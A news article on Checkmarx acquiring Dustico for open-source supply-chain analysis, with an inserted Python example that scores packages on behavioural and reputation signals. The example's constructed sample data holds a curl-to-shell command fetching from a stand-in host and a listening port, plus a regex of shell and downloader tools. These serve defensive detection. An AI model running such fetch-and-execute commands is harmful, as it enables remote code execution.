Checkmarx has acquired SaaS code checking tool Dustico as it warns of stranger danger in open-source software. Dustico checks for malicious attacks and backdoors in open-source supply chains. Checkmarx is to integrate Dustico’s behavioural analysis technology with its existing application security testing (AST) tools.
Maty Siman, CTO, Checkmarx, said: “Today’s adversaries have zoned-in on software supply chains – many of which rely heavily on open source. As the threat of tampering in third-party packages increases, development teams must operate with the proactive assumption that all code may have been maliciously manipulated.
“With Dustico, we’re building on our mission to secure open source by enabling customers to perform vulnerability, behavioral, and reputational analysis from a single solution. This will give developers and security leaders the insights and confidence needed to choose safer code packages, and in turn, build more secure applications at speed.”
As open-source becomes more widely used, it creates more opportunities for malicious actors. Malicious libraries integrated with trusted open-source tools are not uncommon. Many can be detected using existing software testing tools, but not all. Checkmarx wants to raise the testing bar to detect those libraries that are missed by existing tools.
According to Robert Haynes, SCA and open-source evangelist at Checkmarx, this is all about establishing risk. In a blog, he writes: “Evaluating what a piece of software does, what processes it creates, what ports it opens, and what connections it attempts to make are all critical indicators of the package’s intent.
“Looking at who contributed to the code, what other packages they have created, and their overall online presence can give us indicators and evidence of the potential intent of their coding activities. While this information might not be definitive, it’s definitely a useful component in building a risk model.”
The challenge for organisations, according to Haynes, is the sheer volume of open-source used by enterprise developers. It makes it hard for them to detect risk on a consistent basis. Even more complex is building their own reputation solution to decide which contributors can be trusted.
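The indicators Haynes lists (processes spawned, ports opened, connections attempted, and who the contributor is) can be combined into a simple risk model. The following is an added illustration, not Dustico's or Checkmarx's code, and it makes assumptions the article does not: the sandbox event format, the allow-list of registry hosts, the scoring weights and the contributor-metadata fields are all constructed for this example.

```python
"""Toy package risk model: behavioural indicators plus contributor reputation.

Added example. The event records, contributor data, allow-list and weights are
all constructed assumptions; nothing here is output from a real sandbox or from
Dustico.
"""
from dataclasses import dataclass, field
import re

# Hosts an install is expected to contact (constructed allow-list of registries).
ALLOWED_HOSTS = {"registry.npmjs.org", "pypi.org", "files.pythonhosted.org"}

# Shells and downloaders are rarely legitimate inside an install hook.
SHELL_OR_DOWNLOADER = re.compile(r"\b(sh|bash|zsh|curl|wget|powershell)\b")

# Constructed sandbox observations: (event kind, detail), one list per package.
SAMPLE_EVENTS = {
    "benign-lib": [
        ("process", "node scripts/build.js"),
        ("connect", "registry.npmjs.org:443"),
    ],
    "suspicious-lib": [
        ("process", "/bin/sh -c 'curl http://example.invalid/stage2 | sh'"),
        ("connect", "example.invalid:80"),
        ("listen", "0.0.0.0:4444"),
    ],
}

# Constructed contributor metadata (field names are assumptions).
SAMPLE_CONTRIBUTORS = {
    "benign-lib": {"account_age_days": 2100, "other_packages": 14},
    "suspicious-lib": {"account_age_days": 4, "other_packages": 0},
}


@dataclass
class Assessment:
    package: str
    score: int = 0
    reasons: list = field(default_factory=list)

    @property
    def verdict(self) -> str:
        # Thresholds are arbitrary; tune them against real review outcomes.
        if self.score >= 50:
            return "high"
        if self.score >= 20:
            return "medium"
        return "low"

    def add(self, points: int, reason: str) -> None:
        self.score = min(100, self.score + points)
        self.reasons.append(reason)


def assess(package, events, contributor, allowed_hosts=ALLOWED_HOSTS) -> Assessment:
    """Score one package from behavioural events and contributor reputation."""
    a = Assessment(package)
    seen_hosts = set()
    for kind, detail in events:
        if kind == "process" and SHELL_OR_DOWNLOADER.search(detail):
            a.add(40, f"install-time shell/downloader: {detail}")
        elif kind == "connect":
            host = detail.rsplit(":", 1)[0]
            if host not in allowed_hosts and host not in seen_hosts:
                seen_hosts.add(host)  # count each unexpected host once
                a.add(25, f"outbound connection to unexpected host {host}")
        elif kind == "listen":
            a.add(35, f"opens listening port {detail}")
    # Reputation signals: weak on their own, useful as part of the model.
    if contributor["account_age_days"] < 30:
        a.add(15, "contributor account younger than 30 days")
    if contributor["other_packages"] == 0:
        a.add(10, "contributor has no other published packages")
    return a


def assess_sample(name: str) -> Assessment:
    """Assess one of the constructed sample packages by name."""
    return assess(name, SAMPLE_EVENTS[name], SAMPLE_CONTRIBUTORS[name])


if __name__ == "__main__":
    for name in SAMPLE_EVENTS:
        result = assess_sample(name)
        print(f"{name}: {result.verdict} ({result.score})")
        for reason in result.reasons:
            print(f"  - {reason}")
```

Each reason is kept alongside the score so a reviewer can see which indicator drove the verdict rather than trusting a bare number; that is the "evidence" part of the risk model Haynes describes.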
Checkmarx lists three reasons for acquiring Dustico:
- Powered by highly advanced machine learning models, Dustico automatically detects abnormal behaviours in code packages and checks IOCs against multiple threat intelligence feeds to provide accurate and advanced detection of attackers’ activity (TTPs).
- Dustico’s technology is engineered to fetch packages for analysis as soon as they are published online, giving development teams a faster and more streamlined user experience.
- With Dustico being natively integrated into the Checkmarx platform, developers will benefit from a frictionless user experience via direct integrations into their CI and build systems.
Enterprise Times: What does this mean?
Acquisitions are the name of the game in the security industry at the moment. Small companies with new approaches to problems keep popping up. Some have good tech, and many quickly build a customer base. For some security vendors, acquisitions are as much about those customers as they are the tech.
In this case, Checkmarx appears to be much more focused on the tech and what it adds to its existing solutions. That is good news for its customers, and in acquiring Dustico, it throws light into the dark corners of open-source. What is particularly relevant here is that this is as much about assessing risk as about detecting bad code. The ability to detect and assess new packages as they are released will also appeal. It reduces the risk of something ending up inside the enterprise before it has been reviewed.
However, there is a major caveat here. This is aimed at enterprise developers who already track the open-source packages they use. That is not the case in all organisations. There is a lot of casual use of open-source across enterprises. For this to be effective, it will need changes to processes inside those developer teams.
It also needs those same organisations to extend that tracking to the code and tools used by their citizen developers. Code is no longer the sole province of professional developers. Tools like this need to be accessible to all if they are to be effective.